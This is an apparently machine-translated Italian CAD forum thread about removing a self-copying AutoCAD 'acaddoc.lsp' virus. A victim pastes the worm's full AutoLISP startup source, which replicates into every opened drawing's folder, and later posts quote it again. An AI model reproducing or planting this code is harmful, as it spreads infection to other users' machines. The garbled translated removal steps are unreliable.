• This forum is the machine-generated translation of www.cad3d.it/forum1 - the Italian design community. Several terms are not translated correctly.

acaddoc.lsp created when opening each dwg file

mar.dan

Guest
tutte le volte che apro un file di autocad con autocad 2012 ma anche su una versione 2010 su un altro pc, mi si crea in automatico un file che sia autonomina "acaddoc.lsp".
lo fa anche aprendo file vecchi di lavori eseguiti quando questo problema non c'era.
non so come fare per eliminarlo. ora lo stesso problema c'è anche sull'altro pc in cui ho voluto copiare/incollare un file dwg per vedere se lo faceva anche di là.

<hs tutta l'aria di essere un virus o qualcosa di simile da come si riproduce.

cosa faccio?

se apro il file con il blocco note c'è scritto questo:
"(defun-q s::startup
(/ basepath
baseacad
acaddocpath
r-acaddoc
w-basepath
rl-acaddoc
acaddoclsp
c-acaddocname
c-acaddocpath
c-acaddoc )
(setq basepath
(findfile "base.dcl"))(setq basepath
(substr basepath 1 (- (strlen basepath) 8)))
(setq baseacad (strcat basepath "acaddoc.lsp"))
(setq acaddocpath (findfile "acaddoc.lsp"))
(setq acaddocpath (substr acaddocpath
1 (- (strlen acaddocpath) 11)))
(setq acaddoclsp (strcat acaddocpath "acaddoc.lsp"))

(setq c-acaddocname (getvar "dwgname"))
(setq c-acaddocpath (findfile c-acaddocname))
(setq c-acaddocpath
(substr c-acaddocpath
1 (- (strlen c-acaddocpath) (strlen c-acaddocname))))
(setq c-acaddoc
(strcat c-acaddocpath "acaddoc.lsp"))
(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath))
(progn
(setq r-acaddoc
(open acaddoclsp "r"))
(setq w-basepath
(open baseacad "w"))
(while
(setq rl-acaddoc
(read-line r-acaddoc))
(write-line rl-acaddoc w-basepath))
(close w-basepath)
(close r-acaddoc))

(progn
(setq r-acaddoc
(open acaddoclsp "r"))
(setq w-basepath
(open c-acaddoc "w"))
(while
(setq rl-acaddoc
(read-line r-acaddoc))
(write-line rl-acaddoc w-basepath))
(close w-basepath)
(close r-acaddoc)))
(princ))
(load "acadapq")
(princ)
"
 
Okay, thank you. for those who do not speak English, I make a brief summary:
1-download the file attached to this post (acaddocfix.lsp).
2-aprite autocad, go to the tendon tools
3-choose voice charge application
4-Opens a window
5-go to search for the newly downloaded file on your computer
6-click charge
7-click close
8-closed autocad

deletion of all acaddoc.lsp virus files on pc:
1-download this dos programme (del-acaddoc.bat)
2-click 2 times on it
3-just open, to the black screen, write y and send dates
4-wait a few seconds that the program works well
5-The program will ask you to press any key to finish the operation and exit.
 

Attachments

Okay, thank you. for those who do not speak English, I make a brief summary:
1-download the file attached to this post (acaddocfix.lsp).
2-aprite autocad, go to the tendon tools
3-choose voice charge application
4-Opens a window
5-go to search for the newly downloaded file on your computer
6-click charge
7-click close
8-closed autocad

deletion of all acaddoc.lsp virus files on pc:
1-download this dos programme (del-acaddoc.bat)
2-click 2 times on it
3-just open, to the black screen, write y and send dates
4-wait a few seconds that the program works well
5-The program will ask you to press any key to finish the operation and exit.
ho provato questa procedura ma il problem persists!
 
I don't have a program that had acaddoc.lsp, even if it was re-examined!
 
Last edited by a moderator:
So let's see a little:
1. starts reading the forum rules and respect them
2. present in special area
3. Avoid screaming
4. use the "search" function of the forum (although it works as crap, but this is alas laughter)
5. explain your problem better, like explaining:
- What program do you have the problem with?
- what is a program that "has acaddoc.lsp"
- what do you mean by "sinky pc"

do all this, read the last post of this thread:http://www.cad3d.it/forum1/showthread.php?t=14777where I managed to solve
 
12345 (this here)

Why don't they notice somehow? I also had some difficulty squandering myself among the various discussions. . .
 
So let's see a little:
1. starts reading the forum rules and respect them
2. present in special area
3. Avoid screaming
4. use the "search" function of the forum (although it works as crap, but this is alas laughter)
5. explain your problem better, like explaining:
- What program do you have the problem with?
- what is a program that "has acaddoc.lsp"
- what do you mean by "sinky pc"

do all this, read the last post of this thread:http://www.cad3d.it/forum1/showthread.php?t=14777where I managed to solve
First of all I welcome your "ramanzina" and apologize, I do not know the rules of the forums.. and I did not think I was wrong....for work I use a program that draws air channeling is called saecos...after I carried out the operation that indicated me saverio cad 3d the program has deleted me the file acaddoc.lsp present in the saecos and the program has stopped working, and now I also tried your operation but nothing.
first I had the same problem with the acad.lsp but it was enough to erase it from support and everything passed...but this is really hostical.
question: I have deleted the last 2 calls but I have noticed that inside acad.mnl there are five more similar...that I will take you back...that I will gate those too?
(vl-file-delete (strcat dpath "acaddoc.lsp")
)
;load "acadapq"
(setvar "cmdecho" wold_cmd)
(load "acadappp.lsp")
(princ)
 
the procedure continues to persist. What else can I do?




tutte le volte che apro un file di autocad con autocad 2012 ma anche su una versione 2010 su un altro pc, mi si crea in automatico un file che sia autonomina "acaddoc.lsp".
lo fa anche aprendo file vecchi di lavori eseguiti quando questo problema non c'era.
non so come fare per eliminarlo. ora lo stesso problema c'è anche sull'altro pc in cui ho voluto copiare/incollare un file dwg per vedere se lo faceva anche di là.

<hs tutta l'aria di essere un virus o qualcosa di simile da come si riproduce.

cosa faccio?

se apro il file con il blocco note c'è scritto questo:
"(defun-q s::startup
(/ basepath
baseacad
acaddocpath
r-acaddoc
w-basepath
rl-acaddoc
acaddoclsp
c-acaddocname
c-acaddocpath
c-acaddoc )
(setq basepath
(findfile "base.dcl"))(setq basepath
(substr basepath 1 (- (strlen basepath) 8)))
(setq baseacad (strcat basepath "acaddoc.lsp"))
(setq acaddocpath (findfile "acaddoc.lsp"))
(setq acaddocpath (substr acaddocpath
1 (- (strlen acaddocpath) 11)))
(setq acaddoclsp (strcat acaddocpath "acaddoc.lsp"))

(setq c-acaddocname (getvar "dwgname"))
(setq c-acaddocpath (findfile c-acaddocname))
(setq c-acaddocpath
(substr c-acaddocpath
1 (- (strlen c-acaddocpath) (strlen c-acaddocname))))
(setq c-acaddoc
(strcat c-acaddocpath "acaddoc.lsp"))
(if
(and
(/= basepath acaddocpath)
(= c-acaddocpath acaddocpath))
(progn
(setq r-acaddoc
(open acaddoclsp "r"))
(setq w-basepath
(open baseacad "w"))
(while
(setq rl-acaddoc
(read-line r-acaddoc))
(write-line rl-acaddoc w-basepath))
(close w-basepath)
(close r-acaddoc))

(progn
(setq r-acaddoc
(open acaddoclsp "r"))
(setq w-basepath
(open c-acaddoc "w"))
(while
(setq rl-acaddoc
(read-line r-acaddoc))
(write-line rl-acaddoc w-basepath))
(close w-basepath)
(close r-acaddoc)))
(princ))
(load "acadapq")
(princ)
"
 
Okay, thank you. for those who do not speak English, I make a brief summary:
1-download the file attached to this post (acaddocfix.lsp).
2-aprite autocad, go to the tendon tools
3-choose voice charge application
4-Opens a window
5-go to search for the newly downloaded file on your computer
6-click charge
7-click close
8-closed autocad

deletion of all acaddoc.lsp virus files on pc:
1-download this dos programme (del-acaddoc.bat)
2-click 2 times on it
3-just open, to the black screen, write y and send dates
4-wait a few seconds that the program works well
5-The program will ask you to press any key to finish the operation and exit.
using this procedure seems to be resolved... Thank you very much!!!:wink:
 

Forum statistics

Threads
44,997
Messages
339,767
Members
4
Latest member
ibt

Members online

No members online now.
Back
Top